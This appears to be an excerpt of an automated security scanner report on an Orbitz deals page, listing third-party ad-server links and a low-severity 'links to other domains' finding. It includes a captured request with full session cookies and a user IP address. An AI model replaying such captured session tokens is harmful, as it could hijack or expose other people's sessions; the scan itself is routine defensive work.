http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=336x280&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&height=90&width=728&adType=noframe&

Request

GET /App/PerformMDLPDealsContent?deal_id=barbados-vacations&cnt=PKH&homeAirport=DFW\ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=194B15DC298E7682990CFEF1FF6FA1A1; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:46 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 326202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="adsponsorlogo">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=sponsorlogo&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=323x89&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=top&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=top&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_top&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=top&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad300x600_bottom">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=bottom&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=bottom&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=300x600_bottom&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=bottom&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad336x280">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=hoteldeals_package&adsize=336x280&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=middle&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=336x280&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=middle&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=hoteldeals_package&adsize=336x280&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=middle&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="adfeaturedest">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=deals&Section=hoteldeals_package&adsize=featuredest&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=script&pos=middle&"></script>
...[SNIP]...
<div class="ad" id="ad250x250_left">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_left&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=left&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=left&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=left&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad250x250_right">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=250x250_right&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=right&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=right&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&adType=noframe&pos=right&" height="null" width="null" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=SingleDest&Section=main&adsize=120x55_footer&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1x1">
<iframe allowtransparency="true" height="1" width="1channel=deals" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/Section=hoteldeals_package&adsize=1x1&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&height=1&width=1channel=deals&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&height=1&width=1channel=deals&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&height=1&width=1channel=deals&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&Section=hoteldeals_package&adsize=1x1&dest=BARBADOS&area=DPT&country=BB&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662807533&dsrc=7&height=1&width=1channel=deals&" height="1" width="1channel=deals" border="0"></a>
...[SNIP]...

17.351. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=all_destinations_interests&cnt=OVI&z=2ed6&r=15

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/Orbitz
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitz.teebone.com/orbitz/index.cfm
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&Section=main&adsize=1x1&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_bottom&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_top&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=336x280&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=sponsorlogo&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&
http://www.revresda.com/html.ng/Section=main&adsize=1x1&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=featuredest&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&Section=main&adsize=1x1&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&height=1&width=1channel=deals&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=SingleDest&Section=main&adsize=120x55_footer&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_left&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=left&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=250x250_right&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=right&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_bottom&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=bottom&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=300x600_top&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=top&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=323x89&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=336x280&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&pos=middle&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=728x90_top&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=sponsorlogo&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&adType=noframe&
http://www.revresda.com/js.ng/Params.richmedia=yes&Section=main&adsize=1x1&dest=INTERESTS_&area=DPT&country=INTERESTS&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=DESTINATIONS&tile=1296662791865&dsrc=7&height=1&width=1channel=deals&
